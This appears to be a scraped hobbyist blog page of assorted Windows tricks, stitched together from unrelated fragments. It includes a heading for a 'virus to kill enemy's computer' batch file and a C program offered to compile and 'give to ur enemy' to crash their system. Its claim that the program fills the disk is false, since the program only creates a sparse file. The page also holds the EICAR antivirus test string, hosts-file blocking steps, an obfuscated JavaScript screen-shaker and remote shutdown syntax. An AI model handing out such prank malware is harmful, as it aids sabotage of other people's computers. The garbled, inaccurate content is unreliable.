Get the old Facebook Chat back

  Want the old Facebook chat back ?
          New interface sucks ... isn't it ?


   I've got a solution for you.

 Go to this link Directly

  Or


 Install this Greasemonkey script


  http://userscripts.org/scripts/show/107107




     Download Greasemonkey here

virus to kill enemy's compter

Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don't run this on ur pc

Removing Programs from the Add/Remove Programs

Removing Programs from the Add/Remove Programs
All Windows programs must include an Uninstall program, sometimes though the program may get removed but entry in Add/Remove programs doesn't, from this key you can remove those orphaned entries.

Useful DOS commands !!!!

Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Adobe Photoshop (if installed) - photoshop
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt

C progm 2 Create 1 Terabyte File...

Guyz enjoy..
  here is 1 c program to create 1terabyte file...it wil load all in ur hard disk...so wil create system crash.....
  ((( dont try on own pc..))))

Compile it..and give da exe file to ur enemy

====================

#define _WIN32_WINNT 0x0500
#include
#include
#include //Dev C++ if use
int main(int argc, char* argv[])
{


HANDLE h = CreateFile("geek.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);

DWORD dw;
DeviceIoControl(h, FSCTL_SET_SPARSE, NULL, 0, NULL, 0, &dw, NULL);

LONG lDist = 4095;
SetFilePointer(h, 0, &lDist, FILE_BEGIN);
SetEndOfFile(h);

CloseHandle(h);
system("PAUSE");
return 0;
}
=====================
compile it wid any CPP compiler

A Trick To Check Ur Antivirus Is Working Properly


Open notepad
Copy this code in the text file....

"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

without qutoes....

then save it with the name fakevirus.exe

If this file got deleted immediately ....that means ur antivirus is working n updated ..

How To Block Websties Without Software, block webs



How To Block Websties Without Software, block webs
Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2
www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2
www.blockedsite.com

-->
www.blockedsite.com is now unaccessable<--


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.
IE: 127.0.0.3 www.blablabla.com127.0.0.4 www.blablabla.com127.0.0.5 www.blablabla.com

Javascript: Screen Vibrator

This javascript code allows you to vibrate your screen. Just copy this code to your browser's address bar and hit return. It will vibrate the screen until you press the mouse button.

javascript:function flood(n){if(self.moveBy){for(i=20;i>0;i--){for(j=n;j>0;j--){self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0);}}}}flood(10);{var inp="!!!skcor moc.topsgolb.dnert-ni-hcet";var outp="";for(i=0;i<inp.length;i++){outp=inp.charAt(i)+outp;}alert(outp);};reverse();

Batch File : Shutdown

Shutdown
This commans allows user to shut down or restart a local or remote computer. Used without parameters, shutdown will logoff the current user.
Syntax
shutdown [{-l|-s|-r|-a}] [-f] [-m [\\ComputerName]] [-t xx] [-c "message"] [-d[u][p]:xx:yy]
Parameters

permanent-solution-for-not-responding

If you use windows then surely you encounter 'Not Responding' problem often. Many programs go not responding due to a number of known and unknown reasons. Well you see a significant amount of time after which windows recovers from Not Responding problem and comes back to its senses. Whether some program or software hangs and windows browser freezes for a while.